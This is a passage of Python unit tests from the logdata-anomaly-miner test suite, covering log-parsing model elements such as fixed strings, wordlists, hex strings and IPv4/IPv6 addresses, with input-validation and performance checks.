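            self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict)

    def test7default_branch_input_validation(self):
        """Check if default_branch is validated: anything that is not a model element is a TypeError."""
        branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me}
        for default_branch in ("path", b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(
                TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, default_branch)

    def test8get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        model_element = ElementValueBranchModelElement(self.id_, self.value_model, None, {"path: ": self.path_me, "data: ": self.data_me})
        data = b"abcdefghijklmnopqrstuvwxyz.!?"
        # both the test dummy and the real MatchContext are accepted
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        invalid_contexts = (
            MatchElement(None, data, None, None), data, data.decode(), 123, 123.22, True, None, [],
            {"key": MatchContext(data)}, set(), (), model_element)
        for match_context in invalid_contexts:
            self.assertRaises(AttributeError, model_element.get_match_element, self.path, match_context)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/FirstMatchModelElementTest.py000066400000000000000000000174771500476301700312040ustar00rootroot00000000000000
import unittest
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement


class FirstDataModelElementTest(TestBase):
    """Unittests for the FirstMatchModelElement."""

    id_ = "first"
    path = "path"
    # me2 is listed before me3 although me3 matches a prefix of me2's data: the first matching child wins.
    me1 = DummyFixedDataModelElement("me1", b"The first fixed string.")
    me2 = DummyFixedDataModelElement("me2", b"Random string23.")
    me3 = DummyFixedDataModelElement("me3", b"Random string2")
    children = [me1, me2, me3]

    def test1get_match_element_valid_match(self):
        """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters."""
        # (data, expected match value, id of the child that produced it)
        cases = [
            (b"The first fixed string. Random string23.", b"The first fixed string.", "/me1"),
            (b"Random string23. Random string23.", b"Random string23.", "/me2"),
            (b"Random string2 Random string23.", b"Random string2", "/me3"),
            # me2 does not match "Random string24.", so me3 takes its prefix
            (b"Random string24. Random string23.", b"Random string2", "/me3"),
        ]
        for data, value, child_id in cases:
            match_context = DummyMatchContext(data)
            first_match_me = FirstMatchModelElement(self.id_, self.children)
            match_element = first_match_me.get_match_element(self.path, match_context)
            self.compare_match_results(data, match_element, match_context, self.id_ + child_id, self.path, value, value, None)

    def test2get_match_element_no_match(self):
        """Parse not matching substring from MatchContext and check if the MatchContext was not changed."""
        for data in (b"some none matching string", b"The first fixed string", b"Random string42"):
            match_context = DummyMatchContext(data)
            first_match_me = FirstMatchModelElement(self.id_, self.children)
            match_element = first_match_me.get_match_element(self.path, match_context)
            self.compare_no_match_results(data, match_element, match_context)

    def test3element_id_input_validation(self):
        """Check if element_id is validated: an empty string is a ValueError, any non-str value a TypeError."""
        self.assertRaises(ValueError, FirstMatchModelElement, "", self.children)  # empty element_id
        for element_id in (None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, FirstMatchModelElement, element_id, self.children)

    def test4children_input_validation(self):
        """Check if children is validated: non-list values are a TypeError, an empty list is a ValueError."""
        # list children with no ModelElementInterface elements is not allowed either
        for children in ("path", None, b"path", True, 123, 123.22, {"id": "path"}, ["path"]):
            self.assertRaises(TypeError, FirstMatchModelElement, self.id_, children)
        self.assertRaises(ValueError, FirstMatchModelElement, self.id_, [])  # empty list children is not allowed
        for children in ((), set()):
            self.assertRaises(TypeError, FirstMatchModelElement, self.id_, children)

    def test5get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        model_element = FirstMatchModelElement(self.id_, self.children)
        data = b"abcdefghijklmnopqrstuvwxyz.!?"
        # both the test dummy and the real MatchContext are accepted
        model_element.get_match_element(self.path, DummyMatchContext(data))
        model_element.get_match_element(self.path, MatchContext(data))
        invalid_contexts = (
            MatchElement(None, data, None, None), data, data.decode(), 123, 123.22, True, None, [],
            {"key": MatchContext(data)}, set(), (), model_element)
        for match_context in invalid_contexts:
            self.assertRaises(AttributeError, model_element.get_match_element, self.path, match_context)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/FixedDataModelElementTest.py000066400000000000000000000133401500476301700307620ustar00rootroot00000000000000
import unittest
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext


class FixedDataModelElementTest(TestBase):
    """Unittests for the FixedDataModelElement."""

    data = b"fixed data. Other data."
    id_ = "fixed"
    path = "path"

    def test1get_match_element_valid_match(self):
        """Parse matching substring from MatchContext and check if the MatchContext was updated with the fixed string."""
        fixed_string = b"fixed data."
        fixed_dme = FixedDataModelElement(self.id_, fixed_string)
        match_context = DummyMatchContext(self.data)
        match_element = fixed_dme.get_match_element(self.path, match_context)
        self.compare_match_results(self.data, match_element, match_context, self.id_, self.path, fixed_string, fixed_string, None)

    def test2get_match_element_no_match(self):
        """Parse not matching substring from MatchContext and check if the MatchContext was not changed."""
        no_match_string = b"Hello World."
        match_context = DummyMatchContext(self.data)
        fixed_dme = FixedDataModelElement(self.id_, no_match_string)
        match_element = fixed_dme.get_match_element(self.path, match_context)
        self.compare_no_match_results(self.data, match_element, match_context)

    def test3element_id_input_validation(self):
        """Check if element_id is validated: an empty string is a ValueError, any non-str value a TypeError."""
        self.assertRaises(ValueError, FixedDataModelElement, "", self.data)  # empty element_id
        for element_id in (None, b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, FixedDataModelElement, element_id, self.data)

    def test4fixed_data_input_validation(self):
        """Check if fixed_data is validated: empty bytes are a ValueError, any non-bytes value a TypeError."""
        self.assertRaises(ValueError, FixedDataModelElement, self.id_, b"")  # empty fixed_string
        for fixed_string in (None, "path", True, 123, 123.22, {"string": "string"}, ["path"], [], (), set()):
            self.assertRaises(TypeError, FixedDataModelElement, self.id_, fixed_string)

    def test5get_match_element_match_context_input_validation(self):
        """Check if an exception is raised, when other classes than MatchContext are used in get_match_element."""
        model_element = FixedDataModelElement(self.id_, self.data)
        data = self.data
        model_element.get_match_element(self.path, DummyMatchContext(data))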
model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/FixedWordlistDataModelElementTest.py000066400000000000000000000170371500476301700325210ustar00rootroot00000000000000import unittest from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class FixedWordlistDataModelElementTest(TestBase): """Unittests for the FixedWordlistDataModelElement.""" id_ = "wordlist" path = "path" wordlist = [b"wordlist", b"word"] def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the 
MatchContext was updated with all characters.""" data = b"wordlist, word" index = 0 value = b"wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, index, None) data = b"word, wordlist" index = 1 value = b"word" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, index, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"string wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"wor wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0 wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1 word" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, 
match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, FixedWordlistDataModelElement, "", self.wordlist) # empty element_id self.assertRaises(TypeError, FixedWordlistDataModelElement, None, self.wordlist) # None element_id self.assertRaises(TypeError, FixedWordlistDataModelElement, b"path", self.wordlist) # bytes element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, True, self.wordlist) # boolean element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, 123, self.wordlist) # integer element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, 123.22, self.wordlist) # float element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, {"id": "path"}, self.wordlist) # dict element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, ["path"], self.wordlist) # list element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, [], self.wordlist) # empty list element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, (), self.wordlist) # empty tuple element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, set(), self.wordlist) # empty set element_id is not allowed def test4wordlist_input_validation(self): """Check if wordlist is validated.""" self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, "path") # string wordlist self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, None) # None wordlist self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, b"path") # bytes wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, True) # boolean wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, 123) # integer wordlist is not allowed 
self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, 123.22) # float wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, {"id": "path"}) # dict wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, ["path", "path2"]) # list wordlist with strings not allowed self.assertRaises(ValueError, FixedWordlistDataModelElement, self.id_, [b"word", b"path", b"path-like"]) # wrong word order self.assertRaises(ValueError, FixedWordlistDataModelElement, self.id_, [b"wordlist", b"word", b"word dictionary"]) # wrong order self.assertRaises(ValueError, FixedWordlistDataModelElement, self.id_, []) # empty list wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, ()) # empty tuple wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, set()) # empty set wordlist is not allowed def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = FixedWordlistDataModelElement(self.id_, self.wordlist) data = b"abcdefghijklmnopqrstuvwxyz.!?" 
model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/HexStringModelElementTest.py000066400000000000000000000215511500476301700310470ustar00rootroot00000000000000import unittest from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class HexStringModelElementTest(TestBase): """Unittests for the HexStringModelElement.""" id_ = "hex" path = "path" def test1get_match_element_valid_match(self): """Try all values and check if the desired results are produced.""" allowed_chars = [b"0", b"1", b"2", b"3", b"4", b"5", b"6", b"7", b"8", b"9", b"a", b"b", b"c", b"d", 
b"e", b"f"] char1 = b"\x00" char2 = b"\x00" hex_string_model_element = HexStringModelElement(self.id_) while ord(char2) < ord(b"\x7F"): data = char2 + char1 match_context = DummyMatchContext(data) match_element = hex_string_model_element.get_match_element(self.path, match_context) if char2 in allowed_chars: if char1 in allowed_chars: match_context.match_string = bytes.fromhex(data.decode()) # match_context.match_string check has to be skipped. match_context.match_data = data[len(match_context.match_string):] # match_context.match_data has to be rewritten. self.compare_match_results( data, match_element, match_context, self.id_, self.path, bytes.fromhex(data.decode()), data, None) self.assertEqual(match_element.get_match_object(), data) else: match_context.match_string = bytes.fromhex("0" + char2.decode()) # match_context.match_string check has to be skipped. self.compare_match_results( data, match_element, match_context, self.id_, self.path, bytes.fromhex("0" + char2.decode()), char2, None) self.assertEqual(match_element.get_match_object(), char2) else: self.compare_no_match_results(data, match_element, match_context) if ord(char1) == 0x7f: char1 = b"\x00" char2 = bytes(chr(ord(char2) + 1), "utf-8") else: char1 = bytes(chr(ord(char1) + 1), "utf-8") allowed_chars = [b"0", b"1", b"2", b"3", b"4", b"5", b"6", b"7", b"8", b"9", b"A", b"B", b"C", b"D", b"E", b"F"] char1 = b"\x00" char2 = b"\x00" hex_string_model_element = HexStringModelElement(self.id_, True) while ord(char2) < ord(b"\x7F"): data = char2 + char1 match_context = DummyMatchContext(data) match_element = hex_string_model_element.get_match_element(self.path, match_context) if char2 in allowed_chars: if char1 in allowed_chars: self.assertEqual(match_element.get_match_object(), data) else: self.assertEqual(match_element.get_match_object(), char2) else: self.compare_no_match_results(data, match_element, match_context) if ord(char1) == 0x7f: char1 = b"\x00" char2 = bytes(chr(ord(char2) + 1), "utf-8") else: char1 
= bytes(chr(ord(char1) + 1), "utf-8") def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) hex_me = HexStringModelElement(self.id_) match_element = hex_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, HexStringModelElement, "") # empty element_id self.assertRaises(TypeError, HexStringModelElement, None) # None element_id self.assertRaises(TypeError, HexStringModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, set()) # empty set element_id is not allowed def test4upper_case_input_validation(self): """Check if element_id is validated.""" self.assertRaises(TypeError, HexStringModelElement, self.id_, "path") # string upper_case self.assertRaises(TypeError, HexStringModelElement, self.id_, None) # None upper_case self.assertRaises(TypeError, HexStringModelElement, self.id_, b"path") # bytes upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, 123) # integer upper_case is not allowed self.assertRaises(TypeError, 
HexStringModelElement, self.id_, 123.22) # float upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, {"id": "path"}) # dict upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, ["path"]) # list upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, []) # empty list upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, ()) # empty tuple upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, set()) # empty set upper_case is not allowed def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = HexStringModelElement(self.id_) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) 
self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test6performance(self): """Test the performance of the implementation. Comment this test out in normal cases.""" import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.HexStringModelElement import HexStringModelElement times = 100000 """ string_short_setup = """ hex_string = b"100" """ string_long_setup = """ hex_string = b"23999EA30A3430DA" """ end_setup = """ dummy_match_context = DummyMatchContext(hex_string) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] hex_string_dme = HexStringModelElement("s0") def run(): match_context = dummy_match_context_list.pop(0) hex_string_dme.get_match_element("hex", match_context) """ _setup_short = import_setup + string_short_setup + end_setup _setup_long = import_setup + string_long_setup + end_setup # import timeit # times = 100000 # print("Every hex string is run 100.000 times.") # t = timeit.timeit(setup=_setup_short, stmt="run()", number=times) # print("Hex string 100: ", t) # t = timeit.timeit(setup=_setup_long, stmt="run()", number=times) # print("Hex string 23999EA30A3430DA: ", t) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/IpAddressDataModelElementTest.py000066400000000000000000000332731500476301700316100ustar00rootroot00000000000000import unittest from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class IpAddressDataModelElementTest(TestBase): """Unittests for the IpAddressDataModelElement.""" id_ = "ip" path = "path" def test1get_match_element_valid_ipv4_match(self): """ This test case checks the functionality by parsing a real IP-addresses. 
The boundary values for IP-addresses is 0.0.0.0 - 255.255.255.255 The numerical representation of the ip address was calculated with the help of http://www.aboutmyip.com/AboutMyXApp/IP2Integer.jsp. """ ip_addr_dme = IpAddressDataModelElement(self.id_) data = b"192.168.0.155 followed by some text" value = b"192.168.0.155" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 3232235675, None) data = b"0.0.0.0." value = b"0.0.0.0" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"255.255.255.255." value = b"255.255.255.255" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 4294967295, None) data = b"192.168.0.155.22 followed by some text" value = b"192.168.0.155" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 3232235675, None) def test2get_match_element_no_match_ipv4(self): """ Test if wrong formats are determined and boundary values are checked. Also check if hexadecimal ip addresses are not parsed as these are not allowed. Test if ip addresses are found, even if they are followed by other numbers. """ ip_addr_dme = IpAddressDataModelElement(self.id_) data = b"192. 
168.0.155 followed by some text" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"256.168.0.155 followed by some text" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"\xc0\xa8\x00\x9b" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_valid_ipv6_match(self): """ This test case checks the functionality by parsing a real IP-addresses. The numerical representation of the ip address was calculated with the help of https://www.ipaddressguide.com/ipv6-to-decimal. """ ip_addr_dme = IpAddressDataModelElement(self.id_, True) data = b"2001:4860:4860::8888 followed by some text" value = b"2001:4860:4860::8888" number = 42541956123769884636017138956568135816 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # full form of IPv6 data = b"fe80:0000:0000:0000:0204:61ff:fe9d:f156." value = b"fe80:0000:0000:0000:0204:61ff:fe9d:f156" number = 338288524927261089654164245681446711638 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # drop leading zeroes data = b"fe80:0:0:0:204:61ff:fe9d:f156." 
value = b"fe80:0:0:0:204:61ff:fe9d:f156" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # collapse multiple zeroes to :: in the IPv6 address data = b"fe80::204:61ff:fe9d:f156 followed by some text" value = b"fe80::204:61ff:fe9d:f156" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # localhost data = b"::1 followed by some text" value = b"::1" number = 1 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # link-local prefix data = b"fe80:: followed by some text" value = b"fe80::" number = 338288524927261089654018896841347694592 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # global unicast prefix data = b"2001:: followed by some text" value = b"2001::" number = 42540488161975842760550356425300246528 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) def test4get_match_element_no_match_ipv6(self): """Test if wrong formats are determined and boundary values are checked.""" ip_addr_dme = IpAddressDataModelElement(self.id_, True) # IPv4 dotted quad at the end data = b"fe80:0000:0000:0000:0204:61ff:254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) 
self.compare_no_match_results(data, match_element, match_context) # drop leading zeroes, IPv4 dotted quad at the end data = b"fe80:0:0:0:0204:61ff:254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # dotted quad at the end, multiple zeroes collapsed data = b"fe80::204:61ff:254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # multiple :: in the IPv6 address data = b"fe80::204:61ff::fe9d:f156" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # IPv4 address with ipv6 being True data = b"254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # g in ip address data = b"2001:4860:48g0::8888 followed by some text" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test5element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, IpAddressDataModelElement, "") # empty element_id self.assertRaises(TypeError, IpAddressDataModelElement, None) # None element_id self.assertRaises(TypeError, IpAddressDataModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, 123.22) # float element_id is not allowed 
self.assertRaises(TypeError, IpAddressDataModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, set()) # empty set element_id is not allowed def test6ipv6_input_validation(self): """Check if ipv6 is validated.""" self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, "path") # string ipv6 self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, None) # None ipv6 self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, b"path") # bytes ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, 123) # integer ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, 123.22) # float ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, {"id": "path"}) # dict ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, ["path"]) # list ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, []) # empty list ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, ()) # empty tuple ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, set()) # empty set ipv6 is not allowed def test7get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = IpAddressDataModelElement(self.id_) data = b"abcdefghijklmnopqrstuvwxyz.!?" 
model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test8performance(self): """Test the performance of the implementation.""" import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement times = 300000 """ ip_192_setup = """ ip = b"192.168.0.155" dme = IpAddressDataModelElement("s0") """ ip_0_setup = """ ip = b"0.0.0.0" dme = IpAddressDataModelElement("s0") """ ip_255_setup = """ ip = b"255.255.255.255" dme = IpAddressDataModelElement("s0") """ end_setup = """ dummy_match_context = DummyMatchContext(ip) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] def run(): match_context = dummy_match_context_list.pop(0) dme.get_match_element("match", match_context) """ _setup192 = import_setup + ip_192_setup 
# Identifier and parser path handed to every JsonModelElement under test.
id_ = "json"
path = "path"
# Single-line payloads; the name says which property of the parser each one exercises.
single_line_json = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNewDoc()"}, {' \
    b'"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}, ' \
    b'{"value": "Undo", "onclick": "UndoDoc()", "clickable": true}]}}}'
single_line_with_optional_key_json = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick":' \
    b' "CreateNewDoc()", "clickable": false}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": ' \
